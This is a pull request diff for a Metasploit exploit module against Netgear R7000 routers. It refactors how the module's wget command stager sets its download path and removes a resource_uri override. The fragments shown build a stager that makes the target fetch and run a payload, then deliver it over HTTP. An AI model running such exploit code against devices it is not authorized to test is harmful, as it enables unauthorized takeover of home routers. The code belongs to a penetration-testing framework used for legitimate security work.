### PR TITLE
Specify default resource in start_service

### DIFF
--- a/modules/exploits/linux/http/netgear_r7000_cgibin_exec.rb
+++ b/modules/exploits/linux/http/netgear_r7000_cgibin_exec.rb
@@ -83,7 +83,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def exploit
     return if check == CheckCode::Safe
 
-    @cmdstager = generate_cmdstager(flavor: :wget).join(';')
+    @cmdstager = generate_cmdstager(flavor: :wget, 'Path' => '/').join(';')
 
     send_request_cgi(
       'method' => 'GET',
@@ -99,11 +99,6 @@ class MetasploitModule < Msf::Exploit::Remote
     else
       super
     end
-  end
-
-  # XXX: This is the only way to force this resource
-  def resource_uri
-    '/'
   end
 
 end


### PR DESCRIPTION
This eliminates the need to override `resource_uri`. Depends on #8078.

One more!

#7968